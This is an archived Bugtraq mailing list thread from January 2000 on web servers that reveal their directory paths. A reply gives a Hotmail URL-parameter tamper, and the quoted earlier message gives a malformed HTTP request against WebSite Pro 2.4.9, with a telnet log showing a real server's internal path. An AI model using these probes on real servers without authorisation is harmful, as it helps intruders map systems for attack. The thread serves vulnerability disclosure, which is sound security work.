Bugtraq mailing list archives

Re: HOTMAIL is revealing Webdirectories

From: emild () TDHP TRANSDATA RO (Gushterul)
Date: Sat, 15 Jan 2000 08:37:11 -0500


How? Get into your Hotmail account. After you are logged in, modify in the
string address the part with "disk=216.33.148.68_" in something like
"disk="abc.beh.doh.cih_". I mean to put string text in the place of the IP
address. It will give you a nice error revealing directory structure of
server and you will be able to understand after this a big part of address
string.

Gushterul

On Thu, 13 Jan 2000, Lark Lizerman wrote:

I got a tip from Noah Rathaus about WebSite Pro latest version(2.4.9). He mentioned a server
where WebSite Pro. 2.4.9 is run.
I discovered, that also the latest version is vulnerable to the bug of revealing webdirectories.
In the new version there must be made a change to retrieve the directoryname.

When you connect to a server send the command line:

GET /HTTP1.0 \

You have now to add a space before the last backspace of the commandline.
That makes the server respond with a "404" error and and prints the directoryname.


Here is the part from the logfile of Windows Telnet Client:

website.oreilly.com:
----------------------------------------------------start-------------------------------------------------------

GET /HTTP1.0 \

HTTP/1.0 404 Not Found
Date: Thu, 13 Jan 2000 20:47:12 GMT
Server: WebSitePro/2.4.9
Accept-ranges: bytes
Content-type: text/html
Content-length: 216

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
                                               <BODY bgcolor="White"><H2>404 Not
 Found</H2>
           The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c
:\1Web\docs\website\HTTP1.0)</CODE><P>
                                      </BODY></HTML>
--------------------------------------------------end--------------------------------------------------------

Here it shows us the directory "c:\1Web\docs\website\".


Status: Vendor contacted and informed about the bug.
Expecting statement about fix.

-------------------------------
Lark Lizerman
Contact:
Lark82 () hotmail com
or
webmaster () doc2000 de
-------------------------------

Current thread:

Re: WebSitePro/2.3.18 + 2.4.9 is revealing Webdirectories Lark Lizerman (Jan 13)
- Re: HOTMAIL is revealing Webdirectories Gushterul (Jan 15)
- Announce: BOF on Distributed DoS, San Jose 1/18/00 David Kennedy CISSP (Jan 15)